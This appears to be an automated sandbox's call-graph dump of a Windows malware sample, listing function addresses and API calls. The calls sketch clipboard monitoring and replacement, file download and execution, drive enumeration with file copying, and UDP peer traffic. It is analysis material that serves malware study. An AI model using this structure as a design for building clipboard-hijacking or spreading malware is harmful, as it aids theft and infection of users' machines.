4874->4878 4875 40a330 __aligned_recalloc_base HeapValidate 4875->4878 4876 40a2e0 HeapAlloc 4876->4878 4877 40a2aa HeapReAlloc 4877->4878 4878->4875 4878->4876 4878->4877 4879 40a3f0 __aligned_recalloc_base 3 API calls 4878->4879 4880 405cb5 4878->4880 4879->4878 4880->4651 4880->4652 4884 40c3db 4881->4884 4882 40a1e0 __aligned_recalloc_base 7 API calls 4882->4884 4883 405d4d 4883->4652 4885 407280 4883->4885 4884->4882 4884->4883 4886 40a1e0 __aligned_recalloc_base 7 API calls 4885->4886 4887 407290 4886->4887 4888 4072d7 4887->4888 4889 40729c memcpy CreateThread CloseHandle 4887->4889 4888->4652 4889->4888 4891 4072e0 4889->4891 4890->4873 4892 407347 4891->4892 4898 4072f1 4891->4898 4893 407345 4892->4893 4896 40ed20 64 API calls 4892->4896 4894 40a3f0 __aligned_recalloc_base 3 API calls 4893->4894 4897 407372 4894->4897 4895 407300 StrChrA 4895->4898 4896->4893 4898->4893 4898->4895 4901 40ed20 9 API calls 4898->4901 4902 40ede3 InternetOpenUrlW 4901->4902 4903 40ef4e InternetCloseHandle Sleep 4901->4903 4904 40ef41 InternetCloseHandle 4902->4904 4905 40ee12 CreateFileW 4902->4905 4906 40ef75 7 API calls 4903->4906 4907 40732f Sleep 4903->4907 4904->4903 4908 40ee41 InternetReadFile 4905->4908 4909 40ef34 CloseHandle 4905->4909 4906->4907 4910 40f004 wsprintfW DeleteFileW Sleep 4906->4910 4907->4898 4911 40ee94 CloseHandle wsprintfW DeleteFileW Sleep 4908->4911 4912 40ee65 4908->4912 4909->4904 4913 40ea00 21 API calls 4910->4913 4929 40ea00 CreateFileW 4911->4929 4912->4911 4914 40ee6e WriteFile 4912->4914 4916 40f044 4913->4916 4914->4908 4918 40f082 DeleteFileW 4916->4918 4919 40f04e Sleep 4916->4919 4918->4907 4922 40ebc0 6 API calls 4919->4922 4920 40ef27 DeleteFileW 4920->4909 4921 40eeeb Sleep 4951 40ebc0 memset memset CreateProcessW 4921->4951 4924 40f065 4922->4924 4924->4907 4926 40f078 ExitProcess 4924->4926 4927 40ef16 ExitProcess 4928 40ef1e 4928->4909 4930 40ea45 CreateFileMappingW 4929->4930 4931 40eb5a 4929->4931 4932 40eb50 CloseHandle 4930->4932 4933 40ea66 MapViewOfFile 4930->4933 4934 40eb60 CreateFileW 4931->4934 4935 40ebb1 4931->4935 4932->4931 4936 40ea85 GetFileSize 4933->4936 4937 40eb46 CloseHandle 4933->4937 4938 40eb82 WriteFile CloseHandle 4934->4938 4939 40eba8 4934->4939 4935->4920 4935->4921 4940 40eaa1 4936->4940 4941 40eb3c UnmapViewOfFile 4936->4941 4937->4932 4938->4939 4942 40a3f0 __aligned_recalloc_base 3 API calls 4939->4942 4956 40ca30 4940->4956 4941->4937 4942->4935 4945 40c3d0 7 API calls 4946 40eaf0 4945->4946 4946->4941 4947 40eb0d memcmp 4946->4947 4947->4941 4948 40eb29 4947->4948 4949 40a3f0 __aligned_recalloc_base 3 API calls 4948->4949 4950 40eb32 4949->4950 4950->4941 4952 40ec31 ShellExecuteW 4951->4952 4953 40ec22 Sleep 4951->4953 4954 40ec66 4952->4954 4955 40ec57 Sleep 4952->4955 4953->4954 4954->4927 4954->4928 4955->4954 4957 40c460 10 API calls 4956->4957 4958 40ca54 4957->4958 4958->4941 4958->4945 4960 40d97d htons inet_addr setsockopt 4959->4960 4965 40daae 4959->4965 4961 40acc0 8 API calls 4960->4961 4962 40d9f6 bind lstrlenA sendto ioctlsocket 4961->4962 4968 40da4b 4962->4968 4965->4436 4966 40da72 5016 40ad80 shutdown closesocket 4966->5016 4967 40a220 9 API calls 4967->4968 4968->4966 4968->4967 5007 40dad0 4968->5007 5023 40de00 memset InternetCrackUrlA InternetOpenA 4969->5023 4972 40dcde 4972->4436 4974 40a3f0 __aligned_recalloc_base 3 API calls 4974->4972 4978 40dcab 4978->4974 4981 40dca1 SysFreeString 4981->4978 5130 40ac80 inet_addr 4984->5130 4987 40ad1c connect 4988 40ad30 getsockname 4987->4988 4989 40ad64 4987->4989 4988->4989 5133 40ad80 shutdown closesocket 4989->5133 4991 40ad6d 4992 40e6b0 4991->4992 5134 40ac60 inet_ntoa 4992->5134 4994 40e6c6 4995 40cc30 11 API calls 4994->4995 4996 40e6e5 4995->4996 5002 40d90c 4996->5002 5135 40e730 memset InternetCrackUrlA InternetOpenA 4996->5135 4999 40a3f0 __aligned_recalloc_base 3 API calls 5001 40e71c 4999->5001 5000 40a3f0 __aligned_recalloc_base 3 API calls 5000->5002 5001->5000 5002->4442 5004 40a514 5003->5004 5005 40a51a 5004->5005 5006 40a3f0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5004->5006 5005->4433 5006->5004 5015 40daec 5007->5015 5008 40dbb4 5008->4968 5009 40db08 recvfrom 5010 40db36 StrCmpNIA 5009->5010 5011 40db29 Sleep 5009->5011 5012 40db55 StrStrIA 5010->5012 5010->5015 5011->5015 5013 40db76 StrChrA 5012->5013 5012->5015 5017 40cae0 5013->5017 5015->5008 5015->5009 5016->4965 5019 40caeb 5017->5019 5018 40caf1 lstrlenA 5018->5019 5020 40cb04 5018->5020 5019->5018 5019->5020 5021 40a1e0 __aligned_recalloc_base 7 API calls 5019->5021 5022 40cb20 memcpy 5019->5022 5020->5015 5021->5019 5022->5019 5022->5020 5024 40dea1 InternetConnectA 5023->5024 5025 40dbda 5023->5025 5026 40e00a InternetCloseHandle 5024->5026 5027 40deda HttpOpenRequestA 5024->5027 5025->4972 5036 40dcf0 5025->5036 5026->5025 5028 40df10 HttpSendRequestA 5027->5028 5029 40dffd InternetCloseHandle 5027->5029 5030 40dff0 InternetCloseHandle 5028->5030 5032 40df2d 5028->5032 5029->5026 5030->5029 5031 40df4e InternetReadFile 5031->5032 5033 40df7b 5031->5033 5032->5031 5032->5033 5034 40a220 9 API calls 5032->5034 5033->5030 5035 40df96 memcpy 5034->5035 5035->5032 5065 405630 5036->5065 5039 40dbf3 5039->4978 5046 40e660 5039->5046 5040 40dd1a SysAllocString 5041 40dd31 CoCreateInstance 5040->5041 5042 40dde7 5040->5042 5043 40dddd SysFreeString 5041->5043 5045 40dd56 5041->5045 5044 40a3f0 __aligned_recalloc_base 3 API calls 5042->5044 5043->5042 5044->5039 5045->5043 5082 40e1b0 5046->5082 5049 40e030 5087 40e480 5049->5087 5052 40dc72 5052->4981 5062 40cc30 5052->5062 5055 40e5e0 6 API calls 5056 40e087 5055->5056 5056->5052 5104 40e2a0 5056->5104 5059 40e2a0 6 API calls 5060 40e0bf 5059->5060 5060->5052 5109 40e150 5060->5109 5125 40cba0 5062->5125 5066 40563d 5065->5066 5067 405643 lstrlenA 5066->5067 5069 40a1e0 __aligned_recalloc_base 7 API calls 5066->5069 5071 405656 5066->5071 5072 40a3f0 __aligned_recalloc_base 3 API calls 5066->5072 5073 4055d0 5066->5073 5077 405580 5066->5077 5067->5066 5067->5071 5069->5066 5071->5039 5071->5040 5072->5066 5074 4055e7 MultiByteToWideChar 5073->5074 5075 4055da lstrlenA 5073->5075 5076 40560c 5074->5076 5075->5074 5076->5066 5078 40558b 5077->5078 5079 405591 lstrlenA 5078->5079 5080 4055d0 2 API calls 5078->5080 5081 4055c7 5078->5081 5079->5078 5080->5078 5081->5066 5085 40e1d6 5082->5085 5083 40dc5d 5083->4978 5083->5049 5084 40e253 lstrcmpiW 5084->5085 5086 40e26b SysFreeString 5084->5086 5085->5083 5085->5084 5085->5086 5086->5085 5089 40e4a6 5087->5089 5088 40e04b 5088->5052 5099 40e5e0 5088->5099 5089->5088 5090 40e533 lstrcmpiW 5089->5090 5091 40e5b3 SysFreeString 5090->5091 5092 40e546 5090->5092 5091->5088 5093 40e150 2 API calls 5092->5093 5095 40e554 5093->5095 5094 40e5a5 5094->5091 5095->5091 5095->5094 5096 40e583 lstrcmpiW 5095->5096 5097 40e595 5096->5097 5098 40e59b SysFreeString 5096->5098 5097->5098 5098->5094 5100 40e150 2 API calls 5099->5100 5102 40e5fb 5100->5102 5101 40e069 5101->5052 5101->5055 5102->5101 5103 40e480 6 API calls 5102->5103 5103->5101 5105 40e150 2 API calls 5104->5105 5106 40e2bb 5105->5106 5108 40e0a5 5106->5108 5113 40e320 5106->5113 5108->5059 5108->5060 5111 40e176 5109->5111 5110 40e18d 5110->5052 5111->5110 5112 40e1b0 2 API calls 5111->5112 5112->5110 5115 40e346 5113->5115 5114 40e45d 5114->5108 5115->5114 5116 40e3d3 lstrcmpiW 5115->5116 5117 40e453 SysFreeString 5116->5117 5118 40e3e6 5116->5118 5117->5114 5119 40e150 2 API calls 5118->5119 5121 40e3f4 5119->5121 5120 40e445 5120->5117 5121->5117 5121->5120 5122 40e423 lstrcmpiW 5121->5122 5123 40e435 5122->5123 5124 40e43b SysFreeString 5122->5124 5123->5124 5124->5120 5129 40cbad 5125->5129 5126 40cb50 _vscprintf wvsprintfA 5126->5129 5127 40cbc8 SysFreeString 5127->4981 5128 40a220 9 API calls 5128->5129 5129->5126 5129->5127 5129->5128 5131 40acac socket 5130->5131 5132 40ac99 gethostbyname 5130->5132 5131->4987 5131->4991 5132->5131 5133->4991 5134->4994 5136 40e707 5135->5136 5137 40e7d4 InternetConnectA 5135->5137 5136->4999 5136->5001 5138 40e954 InternetCloseHandle 5137->5138 5139 40e80d HttpOpenRequestA 5137->5139 5138->5136 5140 40e843 HttpAddRequestHeadersA HttpSendRequestA 5139->5140 5141 40e947 InternetCloseHandle 5139->5141 5142 40e93a InternetCloseHandle 5140->5142 5145 40e88d 5140->5145 5141->5138 5142->5141 5143 40e8a4 InternetReadFile 5144 40e8d1 5143->5144 5143->5145 5144->5142 5145->5143 5145->5144 5146 40a220 9 API calls 5145->5146 5147 40e8ec memcpy 5146->5147 5147->5145 5153 406fd7 5148->5153 5149 4071ab 5151 4071b4 SysFreeString 5149->5151 5152 406f7b SysFreeString 5149->5152 5150 40a3f0 __aligned_recalloc_base 3 API calls 5150->5149 5151->5152 5152->4446 5154 407230 CoCreateInstance 5153->5154 5155 407126 SysAllocString 5153->5155 5156 406ff2 5153->5156 5154->5153 5155->5153 5155->5156 5156->5149 5156->5150 5158 40c10e 5157->5158 5160 40c10a 5157->5160 5161 40c0c0 CryptAcquireContextW 5158->5161 5160->4452 5162 40c0fb 5161->5162 5163 40c0dd CryptGenRandom CryptReleaseContext 5161->5163 5162->5160 5163->5162 5164->4468 5216 40b010 gethostname 5165->5216 5169 40b10c strcmp 5170 40b121 5169->5170 5171 40b0f9 5169->5171 5220 40ac60 inet_ntoa 5170->5220 5171->4468 5173 40b12f strstr 5174 40b180 5173->5174 5175 40b13f 5173->5175 5223 40ac60 inet_ntoa 5174->5223 5221 40ac60 inet_ntoa 5175->5221 5178 40b18e strstr 5180 40b19e 5178->5180 5181 40b1df 5178->5181 5179 40b14d strstr 5179->5171 5182 40b15d 5179->5182 5224 40ac60 inet_ntoa 5180->5224 5226 40ac60 inet_ntoa 5181->5226 5222 40ac60 inet_ntoa 5182->5222 5186 40b1ac strstr 5186->5171 5189 40b1bc 5186->5189 5187 40b1ed strstr 5190 40b1fd 5187->5190 5191 40b23e EnterCriticalSection 5187->5191 5188 40b16b strstr 5188->5171 5188->5174 5225 40ac60 inet_ntoa 5189->5225 5227 40ac60 inet_ntoa 5190->5227 5192 40b256 5191->5192 5202 40b281 5192->5202 5229 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5192->5229 5195 40b1ca strstr 5195->5171 5195->5181 5196 40b20b strstr 5196->5171 5197 40b21b 5196->5197 5228 40ac60 inet_ntoa 5197->5228 5200 40b229 strstr 5200->5171 5200->5191 5201 40b37a LeaveCriticalSection 5201->5171 5202->5201 5203 409fd0 7 API calls 5202->5203 5204 40b2c5 5203->5204 5204->5201 5230 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5204->5230 5206 40b2e3 5207 40b310 5206->5207 5208 40b306 Sleep 5206->5208 5210 40b335 5206->5210 5209 40a3f0 __aligned_recalloc_base 3 API calls 5207->5209 5208->5206 5209->5210 5210->5201 5231 40adc0 5210->5231 5212->4480 5214 40adc0 14 API calls 5213->5214 5215 40adb3 LeaveCriticalSection 5214->5215 5215->4473 5217 40b037 gethostbyname 5216->5217 5218 40b053 5216->5218 5217->5218 5218->5171 5219 40ac60 inet_ntoa 5218->5219 5219->5169 5220->5173 5221->5179 5222->5188 5223->5178 5224->5186 5225->5195 5226->5187 5227->5196 5228->5200 5229->5202 5230->5206 5232 40add4 5231->5232 5234 40adcf 5231->5234 5233 40a1e0 __aligned_recalloc_base 7 API calls 5232->5233 5236 40ade8 5233->5236 5234->5201 5235 40ae44 CreateFileW 5237 40ae93 InterlockedExchange 5235->5237 5238 40ae67 WriteFile FlushFileBuffers CloseHandle 5235->5238 5236->5234 5236->5235 5239 40a3f0 __aligned_recalloc_base 3 API calls 5237->5239 5238->5237 5239->5234 5241 40d49d 5240->5241 5242 40d3d3 5241->5242 5243 40d4c1 WaitForSingleObject 5241->5243 5242->4487 5242->4488 5243->5241 5244 40d4dc CloseHandle 5243->5244 5244->5241 5246 405829 memset GetModuleHandleW 5245->5246 5247 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5246->5247 5247->5247 5248 4058a0 CreateWindowExW 5247->5248 5249 4058cb 5248->5249 5250 4058cd GetMessageA 5248->5250 5251 4058ff ExitThread 5249->5251 5252 4058e1 TranslateMessage DispatchMessageA 5250->5252 5253 4058f7 5250->5253 5252->5250 5253->5246 5253->5251 5275 40e9b0 CreateFileW 5254->5275 5256 406b60 5257 406cb8 ExitThread 5256->5257 5259 406ca8 Sleep 5256->5259 5260 406b99 5256->5260 5278 406340 GetLogicalDrives 5256->5278 5259->5256 5284 406260 5260->5284 5263 406bd0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5265 406c46 wsprintfW 5263->5265 5266 406c5b wsprintfW 5263->5266 5264 406bcb 5265->5266 5290 406650 _chkstk 5266->5290 5273 4073d7 5268->5273 5269 4074b1 Sleep 5269->5273 5270 4073ff Sleep 5270->5273 5271 40742e Sleep wsprintfA DeleteUrlCacheEntry 5343 40ec70 InternetOpenA 5271->5343 5273->5269 5273->5270 5273->5271 5274 40ed20 64 API calls 5273->5274 5274->5273 5276 40e9f8 5275->5276 5277 40e9df GetFileSize CloseHandle 5275->5277 5276->5256 5277->5276 5283 40636d 5278->5283 5279 4063e6 5279->5256 5280 40637c RegOpenKeyExW 5281 40639e RegQueryValueExW 5280->5281 5280->5283 5282 4063da RegCloseKey 5281->5282 5281->5283 5282->5283 5283->5279 5283->5280 5283->5282 5285 4062b9 5284->5285 5286 40627c 5284->5286 5285->5263 5285->5264 5325 4062c0 GetDriveTypeW 5286->5325 5289 4062ab lstrcpyW 5289->5285 5291 40666e 6 API calls 5290->5291 5307 406667 5290->5307 5292 406722 5291->5292 5293 406764 PathFileExistsW 5291->5293 5294 40e9b0 3 API calls 5292->5294 5295 4067e0 PathFileExistsW 5293->5295 5296 406775 PathFileExistsW 5293->5296 5301 40672e 5294->5301 5299 4067f1 5295->5299 5300 406836 FindFirstFileW 5295->5300 5297 406786 CreateDirectoryW 5296->5297 5298 4067a8 PathFileExistsW 5296->5298 5297->5298 5302 406799 SetFileAttributesW 5297->5302 5298->5295 5303 4067b9 CopyFileW 5298->5303 5304 406811 5299->5304 5305 4067f9 5299->5305 5300->5307 5323 40685d 5300->5323 5301->5293 5306 406745 SetFileAttributesW DeleteFileW 5301->5306 5302->5298 5303->5295 5309 4067d1 SetFileAttributesW 5303->5309 5311 406400 3 API calls 5304->5311 5330 406400 CoInitialize CoCreateInstance 5305->5330 5306->5293 5307->5264 5308 40691f lstrcmpW 5312 406935 lstrcmpW 5308->5312 5308->5323 5309->5295 5313 40680c SetFileAttributesW 5311->5313 5312->5323 5313->5300 5314 406af6 FindNextFileW 5314->5308 5316 406b12 FindClose 5314->5316 5316->5307 5317 40697b lstrcmpiW 5317->5323 5318 4069e2 PathMatchSpecW 5319 406a03 wsprintfW SetFileAttributesW DeleteFileW 5318->5319 5318->5323 5319->5323 5320 406a60 PathFileExistsW 5321 406a76 wsprintfW wsprintfW 5320->5321 5320->5323 5322 406ae0 MoveFileExW 5321->5322 5321->5323 5322->5314 5323->5308 5323->5314 5323->5317 5323->5318 5323->5320 5334 406510 CreateDirectoryW wsprintfW FindFirstFileW 5323->5334 5326 40629f 5325->5326 5327 4062e8 5325->5327 5326->5285 5326->5289 5327->5326 5328 4062fc QueryDosDeviceW 5327->5328 5328->5326 5329 406316 StrCmpNW 5328->5329 5329->5326 5331 406436 5330->5331 5333 406472 5330->5333 5332 406440 wsprintfW 5331->5332 5331->5333 5332->5333 5333->5313 5335 406565 lstrcmpW 5334->5335 5336 40663f 5334->5336 5337 40657b lstrcmpW 5335->5337 5342 406591 5335->5342 5336->5323 5338 406593 wsprintfW wsprintfW 5337->5338 5337->5342 5341 4065f6 MoveFileExW 5338->5341 5338->5342 5339 40660c FindNextFileW 5339->5335 5340 406628 FindClose RemoveDirectoryW 5339->5340 5340->5336 5341->5339 5342->5339 5344 40ec96 InternetOpenUrlA 5343->5344 5345 40ed08 Sleep 5343->5345 5346 40ecb5 HttpQueryInfoA 5344->5346 5347 40ecfe InternetCloseHandle 5344->5347 5345->5273 5348 40ecf4 InternetCloseHandle 5346->5348 5349 40ecde 5346->5349 5347->5345 5348->5347 5349->5348 5442 40ccd0 5447 40af80 5442->5447 5445 40ccfa 5448 40b010 2 API calls 5447->5448 5449 40af8f 5448->5449 5450 40af99 5449->5450 5451 40af9d EnterCriticalSection 5449->5451 5450->5445 5454 40cd10 InterlockedExchangeAdd 5450->5454 5452 40afbc LeaveCriticalSection 5451->5452 5452->5450 5455 40cd2d 5454->5455 5465 40cd26 5454->5465 5471 40d000 5455->5471 5458 40cd4d InterlockedIncrement 5468 40cd57 5458->5468 5460 40cd80 5481 40ac60 inet_ntoa 5460->5481 5462 40cd8c 5463 40ce50 InterlockedDecrement 5462->5463 5496 40ad80 shutdown closesocket 5463->5496 5465->5445 5466 40a1e0 __aligned_recalloc_base 7 API calls 5466->5468 5467 40cf30 6 API calls 5467->5468 5468->5460 5468->5463 5468->5466 5468->5467 5470 40a3f0 __aligned_recalloc_base 3 API calls 5468->5470 5478 40b760 5468->5478 5482 40b7b0 5468->5482 5470->5468 5472 40d00d socket 5471->5472 5473 40d022 htons connect 5472->5473 5474 40d07f 5472->5474 5473->5474 5475 40d06a 5473->5475 5474->5472 5476 40cd3d 5474->5476 5497 40ad80 shutdown closesocket 5475->5497 5476->5458 5476->5465 5498 40b6c0 5478->5498 5481->5462 5493 40b7c1 5482->5493 5484 40b7df 5486 40a3f0 __aligned_recalloc_base 3 API calls 5484->5486 5487 40bb8f 5486->5487 5487->5468 5488 40bba0 21 API calls 5488->5493 5491 40b760 13 API calls 5491->5493 5492 40b0c0 32 API calls 5492->5493 5493->5484 5493->5488 5493->5491 5493->5492 5506 40bcf0 5493->5506 5513 40b490 EnterCriticalSection 5493->5513 5518 406e00 5493->5518 5523 406ea0 5493->5523 5528 406cd0 5493->5528 5535 406dd0 5493->5535 5496->5465 5497->5476 5499 40c140 3 API calls 5498->5499 5500 40b6cb 5499->5500 5501 40b6e7 lstrlenA 5500->5501 5502 40c3d0 7 API calls 5501->5502 5503 40b71d 5502->5503 5504 40a3f0 __aligned_recalloc_base 3 API calls 5503->5504 5505 40b748 5503->5505 5504->5505 5505->5468 5507 40bd01 lstrlenA 5506->5507 5508 40c3d0 7 API calls 5507->5508 5511 40bd1f 5508->5511 5509 40bd2b 5510 40a3f0 __aligned_recalloc_base 3 API calls 5509->5510 5512 40bdaf 5509->5512 5510->5512 5511->5507 5511->5509 5512->5493 5515 40b4a8 5513->5515 5514 40b4e4 LeaveCriticalSection 5514->5493 5515->5514 5538 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5515->5538 5517 40b4d3 5517->5514 5539 406e40 5518->5539 5521 406e39 5521->5493 5522 40d3a0 17 API calls 5522->5521 5524 406e40 75 API calls 5523->5524 5525 406ebf 5524->5525 5526 406eec 5525->5526 5554 406f00 5525->5554 5526->5493 5557 405f40 EnterCriticalSection 5528->5557 5530 406d1d 5530->5493 5531 406cea 5531->5530 5562 406d30 5531->5562 5534 40a3f0 __aligned_recalloc_base 3 API calls 5534->5530 5569 406000 EnterCriticalSection 5535->5569 5537 406df2 5537->5493 5538->5517 5542 406e53 5539->5542 5540 406e14 5540->5521 5540->5522 5542->5540 5543 405e50 EnterCriticalSection 5542->5543 5544 40ca60 71 API calls 5543->5544 5545 405e6e 5544->5545 5546 405f2b LeaveCriticalSection 5545->5546 5547 405e87 5545->5547 5550 405ea8 5545->5550 5546->5542 5548 405e91 memcpy 5547->5548 5553 405ea6 5547->5553 5548->5553 5549 40a3f0 __aligned_recalloc_base 3 API calls 5551 405f28 5549->5551 5552 405f06 memcpy 5550->5552 5550->5553 5551->5546 5552->5553 5553->5549 5555 40b6c0 13 API calls 5554->5555 5556 406f45 5555->5556 5556->5526 5559 405f5e 5557->5559 5558 405fea LeaveCriticalSection 5558->5531 5559->5558 5560 40a460 8 API calls 5559->5560 5561 405fbc 5560->5561 5561->5558 5563 40a1e0 __aligned_recalloc_base 7 API calls 5562->5563 5564 406d42 memcpy 5563->5564 5565 40b6c0 13 API calls 5564->5565 5566 406dac 5565->5566 5567 40a3f0 __aligned_recalloc_base 3 API calls 5566->5567 5568 406d11 5567->5568 5568->5534 5594 40cac0 5569->5594 5572 406243 LeaveCriticalSection 5572->5537 5573 40ca60 71 API calls 5574 406039 5573->5574 5574->5572 5576 406094 memcpy 5574->5576 5593 406158 5574->5593 5575 406181 5578 40a3f0 __aligned_recalloc_base 3 API calls 5575->5578 5579 40a3f0 __aligned_recalloc_base 3 API calls 5576->5579 5577 405c90 73 API calls 5577->5575 5580 4061a2 5578->5580 5581 4060b8 5579->5581 5580->5572 5582 4061b1 CreateFileW 5580->5582 5583 40a460 8 API calls 5581->5583 5582->5572 5584 4061d4 5582->5584 5585 4060c8 5583->5585 5588 4061f1 WriteFile 5584->5588 5589 40622f FlushFileBuffers CloseHandle 5584->5589 5586 40a3f0 __aligned_recalloc_base 3 API calls 5585->5586 5587 4060ef 5586->5587 5590 40c3d0 7 API calls 5587->5590 5588->5584 5589->5572 5591 406125 5590->5591 5592 407280 69 API calls 5591->5592 5592->5593 5593->5575 5593->5577 5597 40c010 5594->5597 5599 40c021 5597->5599 5598 40a460 8 API calls 5598->5599 5599->5598 5600 40bf70 70 API calls 5599->5600 5603 40c03b 5599->5603 5604 407d30 68 API calls 5599->5604 5605 40c07b memcmp 5599->5605 5600->5599 5601 40a3f0 __aligned_recalloc_base 3 API calls 5602 406022 5601->5602 5602->5572 5602->5573 5603->5601 5604->5599 5605->5599 5605->5603 5606 401f50 GetQueuedCompletionStatus 5607 401f92 5606->5607 5608 402008 5606->5608 5609 401f97 WSAGetOverlappedResult 5607->5609 5613 401d60 5607->5613 5609->5607 5610 401fb9 WSAGetLastError 5609->5610 5610->5607 5612 401fd3 GetQueuedCompletionStatus 5612->5607 5612->5608 5614 401ef2 InterlockedDecrement setsockopt closesocket 5613->5614 5615 401d74 5613->5615 5632 401e39 5614->5632 5615->5614 5616 401d7c 5615->5616 5633 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5616->5633 5618 401d81 InterlockedExchange 5619 401d98 5618->5619 5620 401e4e 5618->5620 5625 401da9 InterlockedDecrement 5619->5625 5626 401dbc InterlockedDecrement InterlockedExchangeAdd 5619->5626 5619->5632 5621 401e67 5620->5621 5622 401e57 InterlockedDecrement 5620->5622 5623 401e72 5621->5623 5624 401e87 InterlockedDecrement 5621->5624 5622->5612 5642 401ae0 WSASend 5623->5642 5629 401ee9 5624->5629 5625->5612 5627 401e2f 5626->5627 5634 401cf0 5627->5634 5629->5612 5630 401e7e 5630->5612 5632->5612 5633->5618 5635 401d00 InterlockedExchangeAdd 5634->5635 5636 401cfc 5634->5636 5637 401d53 5635->5637 5638 401d17 InterlockedIncrement 5635->5638 5636->5632 5637->5632 5639 401c50 4 API calls 5638->5639 5640 401d46 5639->5640 5640->5637 5641 401d4c InterlockedDecrement 5640->5641 5641->5637 5643 401b50 5642->5643 5644 401b12 WSAGetLastError 5642->5644 5643->5630 5644->5643 5645 401b1f 5644->5645 5646 401b56 5645->5646 5647 401b26 Sleep WSASend 5645->5647 5646->5630 5647->5643 5647->5644 5745 405910 GetWindowLongW 5746 405934 5745->5746 5747 405956 5745->5747 5748 405941 5746->5748 5749 4059c7 IsClipboardFormatAvailable 5746->5749 5751 4059a6 5747->5751 5752 40598e SetWindowLongW 5747->5752 5759 405951 5747->5759 5754 405964 SetClipboardViewer SetWindowLongW 5748->5754 5755 405947 5748->5755 5753 4059e3 IsClipboardFormatAvailable 5749->5753 5757 4059da 5749->5757 5750 405b44 DefWindowProcA 5756 4059ac SendMessageA 5751->5756 5751->5759 5752->5759 5753->5757 5758 4059f8 IsClipboardFormatAvailable 5753->5758 5754->5750 5755->5759 5760 405afd RegisterRawInputDevices ChangeClipboardChain 5755->5760 5756->5759 5761 405a15 OpenClipboard 5757->5761 5762 405adc 5757->5762 5758->5757 5759->5750 5760->5750 5761->5762 5764 405a25 GetClipboardData 5761->5764 5762->5759 5763 405ae5 SendMessageA 5762->5763 5763->5759 5764->5759 5765 405a3d GlobalLock 5764->5765 5765->5759 5766 405a55 5765->5766 5767 405a68 5766->5767 5768 405a89 5766->5768 5769 405a9e 5767->5769 5770 405a6e 5767->5770 5771 405630 13 API calls 5768->5771 5786 405750 5769->5786 5772 405a74 GlobalUnlock CloseClipboard 5770->5772 5780 405510 5770->5780 5771->5772 5772->5762 5776 405ac7 5772->5776 5794 4048a0 lstrlenW 5776->5794 5779 40a3f0 __aligned_recalloc_base 3 API calls 5779->5762 5781 40551b 5780->5781 5782 405521 lstrlenW 5781->5782 5783 405534 5781->5783 5784 40a1e0 __aligned_recalloc_base 7 API calls 5781->5784 5785 405551 lstrcpynW 5781->5785 5782->5781 5782->5783 5783->5772 5784->5781 5785->5781 5785->5783 5791 40575d 5786->5791 5787 405763 lstrlenA 5787->5791 5792 405776 5787->5792 5788 4055d0 2 API calls 5788->5791 5789 40a1e0 __aligned_recalloc_base 7 API calls 5789->5791 5791->5787 5791->5788 5791->5789 5791->5792 5793 40a3f0 __aligned_recalloc_base 3 API calls 5791->5793 5831 405700 5791->5831 5792->5772 5793->5791 5795 4048d4 5794->5795 5804 404c69 StrStrW 5795->5804 5805 404ae2 5795->5805 5808 404af4 5795->5808 5796 404d5e StrStrW 5797 404d71 5796->5797 5798 404d75 StrStrW 5796->5798 5797->5798 5799 404d88 5798->5799 5800 404d8c StrStrW 5798->5800 5799->5800 5801 404d9f 5800->5801 5802 404e09 isalpha 5801->5802 5801->5805 5815 404e43 5801->5815 5802->5801 5803 404e20 isdigit 5802->5803 5803->5801 5803->5805 5806 404c94 StrStrW 5804->5806 5804->5808 5805->5779 5807 404cbf StrStrW 5806->5807 5806->5808 5807->5808 5808->5796 5808->5805 5809 405351 StrStrW 5813 405364 5809->5813 5814 40536b StrStrW 5809->5814 5810 405303 StrStrW 5811 405316 5810->5811 5812 40531d StrStrW 5810->5812 5811->5812 5816 405330 5812->5816 5817 405337 StrStrW 5812->5817 5813->5814 5818 405385 StrStrW 5814->5818 5819 40537e 5814->5819 5815->5809 5815->5810 5816->5817 5817->5809 5822 40534a 5817->5822 5820 405398 5818->5820 5821 40539f StrStrW 5818->5821 5819->5818 5820->5821 5823 4053b2 5821->5823 5824 4053b9 StrStrW 5821->5824 5822->5809 5823->5824 5825 4053cc lstrlenA 5824->5825 5825->5805 5827 405492 GlobalAlloc 5825->5827 5827->5805 5828 4054ad GlobalLock 5827->5828 5828->5805 5829 4054c0 memcpy GlobalUnlock OpenClipboard 5828->5829 5829->5805 5830 4054ed EmptyClipboard SetClipboardData CloseClipboard 5829->5830 5830->5805 5832 40570b 5831->5832 5833 405711 lstrlenA 5832->5833 5834 4055d0 2 API calls 5832->5834 5835 405744 5832->5835 5833->5832 5834->5832 5835->5791 5836 40d710 5837 40b7b0 192 API calls 5836->5837 5838 40d748 5837->5838 5839 40d310 5844 401b60 5839->5844 5841 40d344 5842 40d325 5842->5841 5843 401b60 16 API calls 5842->5843 5843->5841 5845 401c42 5844->5845 5846 401b70 5844->5846 5845->5842 5846->5845 5847 409fd0 7 API calls 5846->5847 5848 401b9d 5847->5848 5848->5845 5849 40a460 8 API calls 5848->5849 5850 401bc9 5849->5850 5851 401be6 5850->5851 5852 401bd6 5850->5852 5854 401ae0 4 API calls 5851->5854 5853 40a3f0 __aligned_recalloc_base 3 API calls 5852->5853 5855 401bdc 5853->5855 5856 401bf3 5854->5856 5855->5842 5857 401c33 5856->5857 5858 401bfc EnterCriticalSection 5856->5858 5859 40a3f0 __aligned_recalloc_base 3 API calls 5857->5859 5860 401c13 5858->5860 5861 401c1f LeaveCriticalSection 5858->5861 5862 401c3c 5859->5862 5860->5861 5861->5842 5863 40a3f0 __aligned_recalloc_base 3 API calls 5862->5863 5863->5845 5864 40d790 5874 4013b0 5864->5874 5866 40d79d 5867 40b440 5 API calls 5866->5867 5868 40d7b7 InterlockedExchangeAdd 5866->5868 5869 40d7fb WaitForSingleObject 5866->5869 5871 40b760 13 API calls 5866->5871 5873 40d81d 5866->5873 5867->5866 5868->5866 5868->5869 5869->5866 5870 40d814 5869->5870 5886 401330 5870->5886 5871->5866 5875 409fd0 7 API calls 5874->5875 5876 4013bb CreateEventA socket 5875->5876 5877 4013f2 5876->5877 5878 4013f8 5876->5878 5879 401330 8 API calls 5877->5879 5880 401401 bind 